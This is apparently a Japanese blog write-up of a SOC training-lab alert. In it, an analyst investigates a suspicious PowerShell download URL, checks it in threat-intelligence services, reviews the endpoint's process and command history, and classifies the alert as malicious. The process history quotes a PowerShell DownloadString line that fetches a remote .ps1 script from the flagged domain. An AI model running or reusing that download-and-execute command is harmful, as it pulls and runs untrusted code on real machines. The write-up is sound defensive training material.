• Details
• playbook
  • Search Log
  • Analyze URL Address
    • 66.198.240.56
    • http[:]//interalliance.org/
    • https[:]//interalliance.org/come2/holme/folde/swiftcopy.ps1
  • Has Anyone Accessed IP/URL/Domain?
  • Containment
    • Endpoint - Aldo(172.16.17.51)
      • Process History
      • CMD History
  • Add Artifacts
• End

Details

EventID: 35
Event Time: Dec. 6, 2020, 1:33 p.m.
Rule: SOC102 - Proxy - Suspicious URL Detected
Level: Security Analyst
Source Address 172.16.17.51
Source Hostname Aldo
Destination Address 66.198.240.56
Destination Hostname interalliance.org
Username aldo
Request URL https[:]//interalliance.org/come2/holme/folde/swiftcopy.ps1
User Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Device Action Allowed

playbook

Search Log

ログを見ると、interalliance[.]orgへのアクセスは残っていなかった。

Analyze URL Address

66.198.240.56

VirusTotal: https://www.virustotal.com/gui/ip-address/66.198.240.56/community
ip-sc: https://ip-sc.net/ja/r/66.198.240.56
VirusTotalにはMalicious判定は無いが、emotetとの関連があるようなレポートがある。
サーバはA2 Hostingらしい。
Best Web Hosting Services | A2 Hosting

http[:]//interalliance.org/

urlscan.io: https://urlscan.io/result/e65360fc-bbe4-43bb-8393-c93451b9e959/#summary
何かしらのWebサイトが動いていたようだ。

https[:]//interalliance.org/come2/holme/folde/swiftcopy.ps1

urlscan.io: https://urlscan.io/result/7d839378-54a9-45ae-a79e-24d89b63a9de/
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/c1b519da6034a9abbe2dd29cf51245be5831567b69788002cf66b4d5deb15493/5fcdac5f92d302697315038f
VirusTotal: https://www.virustotal.com/gui/url/dac6a8c1990738cf7ab5e74ef3ba7ed3075640a374be80804db42e5ce1cd53e2/detection
VirusTotalの結果は最近のアクセスで404になっているためにMalicious判定されていないが、Hybrid-Analysisの過去の解析の結果ではアクセスできたために？Maliciousとなっている。
interalliance[.]orgは異なる二つのIPがある。アラートで上がっていた66.198.240.56はウェブホスティングサービスのA2 HostingのIPだが、swiftcopy.ps1へのアクセスをurlscanで見ると35.209.19.126というGoogle CloudのIPとなっている。
このため、swiftcopy.ps1は偽サイトで配布されているのでは。
このサイトはwordpressに関連しそうな文字列が見受けられるために、wordpressの脆弱性を用いて乗っ取られたことも考えられる。
例えば、

https://interalliance.org/wp-content/uploads/

このようなURLがHTTPのresponseから見られる。
swiftcopy.ps1が取得できなかったために、これ以上の解析はできない。


明らかに、このサイトは怪しい動作をしているかつ.ps1ということはpowershellスクリプトを配布しているのも怪しい。
Answer: Malicious

Has Anyone Accessed IP/URL/Domain?

アラートが上がっているので今回のURLにアクセスしている。
Answer: Accessed

Containment

Endpoint - Aldo(172.16.17.51)

Process History

(snip)
.DownloadString('https://interalliance.org/come2/holme/folde/swiftcopy.ps1');s $tc

今回のアラートの引き金になったSuspicious URLへのアクセスはpoweshellスクリプトが引き金になっている。
このスクリプトを全て載せるとアンチウイルスソフトに止められて記事編集ページに飛べなくなってしまったので省略。

CMD History

06.12.2020 12:18: tasklist
06.12.2020 12:19: net user
06.12.2020 12:20: net user aldo
06.12.2020 12:21: ping 172.16.20.3
06.12.2020 12:22: shutdown -r

今回のアラートの前に何かコマンドが動いている。

Add Artifacts

Value	Type	Comment
66.198.240.56	IP Address	interalliance.org
https[:]//interalliance.org/come2/holme/folde/swiftcopy.ps1	URL Address	A file distributed from a fake website?

True Positiveを選択した。

End

今回は怪しいURL先を確認できないために獲得可能な情報からだけだと、推測に推測を重ねることで判断が必要なアラートであった。
アラートは早めに対処すべき。